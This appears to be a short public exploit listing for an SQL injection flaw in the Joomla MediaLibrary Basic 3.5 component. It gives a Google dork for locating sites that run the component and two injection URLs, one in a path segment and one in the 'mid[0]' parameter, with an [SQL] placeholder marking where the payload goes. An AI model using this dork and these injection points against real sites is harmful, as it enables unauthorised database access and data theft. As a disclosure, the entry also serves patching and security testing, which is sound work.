18 lines
No EOL
783 B
Text
18 lines
No EOL
783 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_booklibrary
|
|
# Date: 22.02.2017
|
|
# Vendor Homepage: http://ordasoft.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
|
|
# Demo: http://ordasvit.com/joomla-media-library/
|
|
# Version: 3.5
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
|
|
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
|
|
# # # # # |